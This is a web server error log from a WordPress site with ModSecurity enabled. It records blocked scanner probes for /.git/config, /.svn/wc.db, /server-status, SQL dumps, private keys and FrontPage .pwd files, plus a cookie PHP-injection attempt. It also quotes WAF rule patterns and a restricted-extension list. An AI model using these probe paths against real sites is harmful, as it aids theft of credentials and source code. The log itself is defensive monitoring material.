18 03:11:52.056021 2024] [ssl:warn] [pid 29425:tid 140247990548352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 18 03:11:52.272794 2024] [ssl:warn] [pid 29426:tid 140247990548352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 18 06:26:45.307213 2024] [authz_core:error] [pid 30102:tid 140247568402176] [client 143.110.217.244:49230] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/18 06:26:48 [error] 29306#29306: *1067340 access forbidden by rule, client: 143.110.217.244, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Nov 18 17:18:59.436562 2024] [authz_core:error] [pid 29445:tid 140247627151104] [client 138.197.191.87:37594] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/18 17:19:04 [error] 29306#29306: *1076217 access forbidden by rule, client: 138.197.191.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Nov 19 03:40:54.704574 2024] [ssl:warn] [pid 31243:tid 139977890228096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 19 03:40:54.997083 2024] [ssl:warn] [pid 31244:tid 139977890228096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 19 03:40:55.445903 2024] [ssl:warn] [pid 31244:tid 139977890228096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 19 03:41:00.121406 2024] [ssl:warn] [pid 31244:tid 139977890228096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 19 03:41:05.121206 2024] [ssl:warn] [pid 31720:tid 139998972135296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 19 03:41:05.432649 2024] [ssl:warn] [pid 31721:tid 139998972135296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 19 09:17:04.890505 2024] [ssl:warn] [pid 8849:tid 139828317738880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 19 09:17:05.254109 2024] [ssl:warn] [pid 8850:tid 139828317738880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/11/19 10:18:57 [error] 9213#9213: *635 access forbidden by rule, client: 45.148.10.122, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/19 18:15:42 [error] 9213#9213: *5086 access forbidden by rule, client: 45.148.10.122, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/20 00:09:35 [error] 9214#9214: *8494 access forbidden by rule, client: 103.102.230.7, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/20 00:46:05 [error] 9214#9214: *8891 access forbidden by rule, client: 147.182.200.94, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Nov 20 00:46:18.774830 2024] [authz_core:error] [pid 8853:tid 139827953493760] [client 139.59.136.184:45866] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/20 00:46:21 [error] 9214#9214: *9072 access forbidden by rule, client: 207.154.197.113, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/20 00:46:22 [error] 9214#9214: *9086 access forbidden by rule, client: 138.197.191.87, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/20 00:46:22 [error] 9214#9214: *9087 access forbidden by rule, client: 164.90.208.56, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/20 00:46:25 [error] 9214#9214: *9126 access forbidden by rule, client: 139.59.136.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/20 00:46:31 [error] 9214#9214: *9173 access forbidden by rule, client: 206.189.2.13, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Nov 20 00:46:32.099020 2024] [authz_core:error] [pid 8853:tid 139827903137536] [client 164.90.228.79:46044] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/20 00:46:42 [error] 9214#9214: *9213 access forbidden by rule, client: 164.90.228.79, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/20 02:38:36 [error] 9214#9214: *10422 access forbidden by rule, client: 103.102.230.7, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/20 03:46:06 [error] 28657#28657: *11022 access forbidden by rule, client: 103.102.230.7, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Nov 20 08:50:18.910039 2024] [authz_core:error] [pid 29415:tid 140411842574080] [client 159.89.12.166:54444] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/20 08:50:27 [error] 28658#28658: *15045 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Nov 20 12:18:14.669399 2024] [:error] [pid 29415:tid 140411876144896] [client 3.21.27.78:58984] [client 3.21.27.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-content/themes/zerif-lite/js/html5.js"] [unique_id "Zz4Z1tQLy0owfseicUH_wgAAAMY"] [Wed Nov 20 14:15:33.386825 2024] [:error] [pid 28693:tid 140411775432448] [client 213.232.87.234:32962] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zz41VYKAUWVw814DucOySQAAAJI"] 2024/11/20 14:15:33 [error] 28658#28658: *19138 access forbidden by rule, client: 213.232.87.234, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Wed Nov 20 14:15:33.426027 2024] [:error] [pid 29415:tid 140411733468928] [client 213.232.87.234:32984] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "Zz41VdQLy0owfseicUEAhwAAANc"] 2024/11/20 14:15:33 [error] 28657#28657: *19107 access forbidden by rule, client: 213.232.87.234, server: investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "investigacionperu.com" [Wed Nov 20 14:15:33.431722 2024] [:error] [pid 28690:tid 140411817395968] [client 213.232.87.234:32988] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "Zz41Vb2_3iPnsGejNC0ksAAAAA0"] [Wed Nov 20 14:15:33.624816 2024] [authz_host:error] [pid 28690:tid 140411850966784] [client 213.232.87.234:32986] AH01753: access check of 'localhost' to /server-status failed, reason: unable to get the remote host name [Wed Nov 20 14:15:33.624902 2024] [authz_core:error] [pid 28690:tid 140411850966784] [client 213.232.87.234:32986] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Nov 20 14:15:33.639391 2024] [:error] [pid 29415:tid 140411725076224] [client 213.232.87.234:33008] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/server.key"] [unique_id "Zz41VdQLy0owfseicUEAjAAAANg"] [Wed Nov 20 14:15:33.641413 2024] [:error] [pid 29415:tid 140411996133120] [client 213.232.87.234:33002] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zz41VdQLy0owfseicUEAjQAAAMA"] [Wed Nov 20 14:15:33.670845 2024] [:error] [pid 29415:tid 140411792217856] [client 213.232.87.234:33010] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/database.sql"] [unique_id "Zz41VdQLy0owfseicUEAkQAAANA"] 2024/11/20 14:15:33 [error] 28658#28658: *19162 access forbidden by rule, client: 109.202.99.36, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/20 14:15:33 [error] 28658#28658: *19169 access forbidden by rule, client: 109.202.99.36, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Nov 20 14:15:33.753377 2024] [:error] [pid 29415:tid 140411741861632] [client 213.232.87.234:33016] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Zz41VdQLy0owfseicUEAlAAAANY"] [Wed Nov 20 14:15:33.772942 2024] [:error] [pid 29415:tid 140411809003264] [client 213.232.87.234:33004] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "Zz41VdQLy0owfseicUEAlQAAAM4"] [Wed Nov 20 14:15:34.200749 2024] [:error] [pid 29415:tid 140411996133120] [client 213.232.87.234:33098] [client 213.232.87.234] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zz41VtQLy0owfseicUEAlgAAAMA"] [Wed Nov 20 14:46:31.008109 2024] [autoindex:error] [pid 28691:tid 140411767039744] [client 147.93.128.101:33542] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 20 17:38:54.584194 2024] [authz_core:error] [pid 20476:tid 140411970955008] [client 143.244.168.161:36214] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/20 17:38:58 [error] 28657#28657: *20951 access forbidden by rule, client: 143.244.168.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Nov 20 18:06:49.170573 2024] [:error] [pid 20476:tid 140411842574080] [client 45.157.52.122:36876] [client 45.157.52.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:14[208]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseven/index.php"] [unique_id "Zz5riQhrLmkrYKc8qBHITgAAAQo"] [Wed Nov 20 18:06:50.547711 2024] [:error] [pid 20476:tid 140411792217856] [client 45.157.52.122:36878] [client 45.157.52.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at REQUEST_COOKIES:14[208]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zz5righrLmkrYKc8qBHITwAAARA"] [Wed Nov 20 20:12:04.580078 2024] [:error] [pid 28693:tid 140411825788672] [client 3.14.6.73:38844] [client 3.14.6.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "grub-client"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "Zz6I5IKAUWVw814DucOzPwAAAIw"] 2024/11/21 16:22:01 [error] 2645#2645: *37063 access forbidden by rule, client: 45.61.146.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Nov 21 19:24:33.139822 2024] [autoindex:error] [pid 3255:tid 140709092845312] [client 13.75.228.19:40032] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Nov 21 21:04:19.507865 2024] [autoindex:error] [pid 3255:tid 140709193557760] [client 165.22.209.249:43250] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Nov 22 03:11:17.230447 2024] [autoindex:error] [pid 2684:tid 140709176772352] [client 194.5.82.121:57868] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Fri Nov 22 03:11:19.830475 2024] [autoindex:error] [pid 2685:tid 140709050881792] [client 194.5.82.121:57874] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Fri Nov 22 03:11:27.950851 2024] [autoindex:error] [pid 2684:tid 140709067667200] [client 194.5.82.121:57892] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Fri Nov 22 03:11:35.033218 2024] [:error] [pid 3255:tid 140709092845312] [client 194.5.82.121:57904] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Fri Nov 22 03:11:46.124283 2024] [autoindex:error] [pid 13426:tid 140709109630720] [client 194.5.82.121:57922] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Fri Nov 22 03:11:54.675349 2024] [autoindex:error] [pid 2684:tid 140709151594240] [client 194.5.82.121:57946] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Fri Nov 22 03:12:08.433841 2024] [autoindex:error] [pid 2685:tid 140709201950464] [client 194.5.82.121:57986] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 22 03:12:12.270188 2024] [autoindex:error] [pid 3255:tid 140709201950464] [client 194.5.82.121:57994] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Fri Nov 22 03:12:14.926686 2024] [autoindex:error] [pid 2685:tid 140709126416128] [client 194.5.82.121:58000] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Fri Nov 22 03:12:16.217721 2024] [autoindex:error] [pid 13426:tid 140709193557760] [client 194.5.82.121:58006] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Fri Nov 22 03:12:16.429589 2024] [:error] [pid 2684:tid 140709084452608] [client 194.5.82.121:58008] File does not exist: 